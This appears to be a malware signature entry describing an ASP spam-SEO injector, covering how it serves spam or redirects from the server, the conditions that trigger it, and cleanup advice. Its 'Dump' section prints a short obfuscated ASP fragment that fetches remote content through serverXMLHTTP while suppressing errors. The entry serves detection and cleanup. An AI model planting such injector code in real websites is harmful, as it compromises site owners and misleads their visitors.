Malware Signatures

  1. Home
  2. Malware Signatures
  3. asp.spam-seo.injector.001

asp.spam-seo.injector.001

Blackhat SEO, or spam-seo, is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance. The payload is ASP based, thus intended for server-side use and the payload is executed directly on the server, while the site is rendered. Only the payload result (spam content, redirect) is visible in the browser, not the malicious code itself.
Spam-seo can also be found inside the site's database being injected by ASP malware or other vulnerabilities, like SQL injections or vulnerable CMS.
Spam injectors rely on external websites or other files to be included when some conditions are met. The triggers can be: User-Agents, IP address regions and referrer sites. That once met the script will load the malicious content.

Affecting

Any ASP based website, often through vulnerable code or compromised FTP credentials.

Cleanup

Look for strange file includes or MSXML2.serverXMLHTTP objects being created without your conscent.

Dump

On Error Resume Next
    Set OO0O000O00OO0 = Server.CreateObject (MSXML2.serverXMLHTTP)
    OO0O000O00OO0.Open GET, O00OO000000O00 , False
    OO0O000O00OO0.setRequestHeader User-Agent, O00OO000000O00
    OO0O000O00OO0.send
    O0O000OO0O = OO0O000O00OO0.ResponseBody